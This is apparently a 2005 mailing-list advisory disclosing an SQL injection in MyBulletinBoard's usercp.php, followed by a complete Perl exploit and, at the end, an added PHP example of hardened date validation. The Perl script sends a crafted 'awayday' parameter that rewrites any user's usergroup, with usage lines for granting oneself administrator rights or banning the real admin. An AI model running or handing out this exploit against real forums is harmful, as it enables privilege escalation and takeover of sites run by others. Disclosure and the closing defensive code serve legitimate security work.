
From: Animal <cOre_(at)_xaker.ru>
Date: 27.10.2005
Subject: SQL-Injection in MyBulletinBoard allows attacker to become a board admin.

Vendor:  www.mybboard.com
Version: 1.00 Preview Release 2, RC4 and maybe prior.
Script:  usercp.php
Code:
>  if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] != "no")
>  {
>      [...]
>      $returndate = $mybb->input['awayday']."-".$mybb->input['awaymonth']."-".$mybb->input['awayyear'];
>      [...]
>      $newprofile = array(
>               "website" => addslashes(htmlspecialchars($mybb->input['website'])),
>               "icq" => intval($mybb->input['icq']),
>               "aim" => addslashes(htmlspecialchars($mybb->input['aim'])),
>               "yahoo" => addslashes(htmlspecialchars($mybb->input['yahoo'])),
>               "msn" => addslashes(htmlspecialchars($mybb->input['msn'])),
>               "birthday" => $bday,
>               "away" => $away,
>               "awaydate" => $awaydate,
>               "returndate" => $returndate,   // <--- not checked (bday too, but anyway)
>               "awayreason" => addslashes(htmlspecialchars($mybb->input['awayreason']))
>               );
>      [...]
>      $db->update_query(TABLE_PREFIX."users", $newprofile, "uid='".$mybb->user['uid']."'");
So: an attacker can replace the "awayday" param with SQL code and change any
field in the _users table.
    Changing "usergroup" for his "uid" to 4 makes him an admin. To use
this bug the attacker has to be
    a registered/awaiting_activation user.

Proof of concept: (For PR2 only)
--<-->--<-->--<-->--<-->--<-->--[START]--<-->--<-->--<-->--<-->--<-->--
#!/usr/bin/perl

###   MyBB Preview Release 2 SQL-Injection PoC ExPlOiT   ###
###   ------------------------------------------------   ###
###   To use this you have to be registered member on    ###
###   a target.                                          ###
###   ------------------------------------------------   ###
###   Glossary:                                          ###
###     [MYBBUSER] - name of the field in cookie;        ###
###     [YOUR_ID]  - your uid :)                         ###
###     [ID]       - victim uid                          ###
###   Available groups:                                  ###
###     1 - Unregistered / Not Logged In                 ###
###     2 - Registered                                   ###
###     3 - Super Moderators                             ###
###     4 - Administrators                               ###
###     5 - Awayting Activation                          ###
###     6 - Moderators                                   ###
###     7 - Banned                                       ###
###   ------------------------------------------------   ###
###   Examples:                                          ###
###    1) TROUBLE --> U need an admin privileges.        ###
###       USAGE --> mybbpr2.pl -u [MYBBUSER] -i          ###
###                 [YOUR_ID] -g 4 server /mybb/         ###
###    2) TROUBLE --> U need to ban real admin.          ###
###       USAGE --> mybbpr2.pl -u [MYBBUSER] -i          ###
###                 [ID] -g 7 server /mybb/              ###

use IO::Socket;

$tmp=0;

while($tmp<@ARGV)
{
 if($ARGV[$tmp] eq "-u")
  {
   $mbuser=$ARGV[$tmp+1];
   $tmp++;
  }
 if($ARGV[$tmp] eq "-i")
  {
   $id=$ARGV[$tmp+1];
   $tmp++;
  }
 if($ARGV[$tmp] eq "-g")
  {
   $ugr=$ARGV[$tmp+1];
   $tmp++;
  }
 if($ARGV[$tmp] eq "-h")
  {
   &f_help();
  }
 $tmp++;
}

$target=$ARGV[@ARGV-2];
$path  =$ARGV[@ARGV-1];

if(!$mbuser || !$id || !$ugr)
{
 &f_die("Some options aren't specified");
}
print "\r\n Attacking http://$target\r\n";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target", PeerPort => "80") || &f_die("Can't connect to $target");
$str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid1=&fid2=&usertitle=&icq=&aim=&msn=&yahoo=&away=yes&awayreason=Hacking+The+World&awayday=1-1-2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%2F%2A&awaymonth=1&awayyear=2009&action=do_profile&regsubmit=Update+Profile";

print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept: */*\nCookie: mybbuser=$mbuser\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: ".length($str)."\n\n$str\n";
while(<$sock>)
{
 if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n Just check it.\r\n"; exit(0)}
}
print "\r\n Looks like exploit failed :[\r\n";

#----------------------------------#
#   S  u  B  r  O  u  T  i  N  e   #
#----------------------------------#


sub f_help()
{
print q(
 Usage: mybbpr2.pl <OPTIONS> SERVER PATH
 Options:
  -u USERKEY        mybbuser field from cookie.
  -i UID            User's uid. (Change group 4 this user)
  -g GROUP          New usergroup. (1-7)
  -h                Displays this help.
  );
 exit(-1);
}
#'
sub f_die($)
{
 print "\r\nERROR: $_[0]\r\n";
 exit(-1);
}
--<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--<-->--<-->--<-->--<-->--

Found: 1-3 Sept 2005. Don't remember.
Updated package is available (I hope).

ByE.
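As an added example (not part of the original post and not MyBB's own code), the date-assembly step in a hardened form: each of the three date fields must be purely digits, is coerced with intval() and checked with checkdate() before anything is concatenated, so a day value carrying a quote and SQL, as in the post above, is refused instead of reaching update_query(). The function name and the `$input` array are assumptions for illustration; in the real code base the same check would sit in front of the `$returndate` assignment, with the database layer escaping values as a second line of defence.

```php
<?php
// Added example, not MyBB code: validate the away/return date components
// before they are concatenated and handed to the database layer.

/**
 * Build a "d-m-Y" return date from untrusted request fields. Returns null when
 * any component is missing, not purely numeric, or not a real calendar date,
 * so the caller can abort the profile update instead of storing garbage.
 */
function build_return_date(array $input): ?string
{
    foreach (['awayday', 'awaymonth', 'awayyear'] as $key) {
        // ctype_digit() is false for "", "-1", "1-1-2009'..." and anything
        // else that is not an unsigned decimal string.
        if (!isset($input[$key]) || !ctype_digit((string) $input[$key])) {
            return null;
        }
    }
    $day   = intval($input['awayday']);
    $month = intval($input['awaymonth']);
    $year  = intval($input['awayyear']);

    // checkdate() rejects impossible combinations such as 31-2-2009.
    if (!checkdate($month, $day, $year)) {
        return null;
    }
    // Only integers are interpolated here, so the result is safe to quote
    // into the UPDATE regardless of what the request originally carried.
    return sprintf('%d-%d-%d', $day, $month, $year);
}

// Constructed request data (not captured traffic): a normal profile update,
// and one whose day field carries the quote-and-SQL shape from the advisory.
$benign  = ['awayday' => '12', 'awaymonth' => '3', 'awayyear' => '2009'];
$hostile = ['awayday'   => "1-1-2009', usergroup='4' WHERE uid='2' /*",
            'awaymonth' => '1',
            'awayyear'  => '2009'];

foreach (['benign' => $benign, 'hostile' => $hostile] as $label => $request) {
    $returndate = build_return_date($request);
    if ($returndate === null) {
        // In usercp.php this is where the update would be refused and the
        // user shown an error, rather than writing $newprofile.
        echo "$label: profile update refused, invalid return date\n";
    } else {
        echo "$label: returndate accepted as $returndate\n";
    }
}
```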
